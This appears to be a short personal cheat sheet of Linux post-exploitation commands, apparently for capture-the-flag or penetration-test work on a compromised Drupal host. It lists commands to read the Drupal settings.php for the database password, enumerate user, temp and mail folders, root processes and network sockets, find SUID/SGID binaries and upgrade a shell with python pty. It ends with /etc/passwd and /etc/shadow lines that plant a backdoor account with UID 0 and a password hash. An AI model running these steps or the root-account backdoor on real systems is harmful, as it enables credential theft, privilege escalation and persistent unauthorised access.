#Drupal
cat /var/www/html/sites/default/settings.php (password for DB) 

cd /home && ll (chech each user folder)

cd /var/tmp && ll
cd /dev/shm && ll
cd /var && ll
cd /opt && ll
cd /mail && ll
cd /var/mail && ll

-------ROOT processes--------------
ps aux | grep -i 'root' --color=auto

---------NETWORK------------------(look for local network)
netstat -antup
  OR
ss -tunlp
      
SUIDs & GUIDs
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

----------Shell---------------------
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
------------------
export TERM=xterm-256color
alias ll='clear ; ls -lsaht --color=auto'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
stty raw -echo ; fg ; reset
------------------
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
-----------------
mkdir -p /home/arfat      
cp -a /etc/skel/. /home/arfat      
chown -R 1003:1003 /home/arfat
------------------
#/etc/shadow
arfat:$1$TebfD20d$GuVgFxi6Z9eYUltbFTdv11:17955:0:99999:7:::
#/etc/passwd
arfat:$1$TebfD20d$GuVgFxi6Z9eYUltbFTdv11:0:0:arfat:/home/arfat:/bin/bash
------------------
getcap -r 2> /dev/null
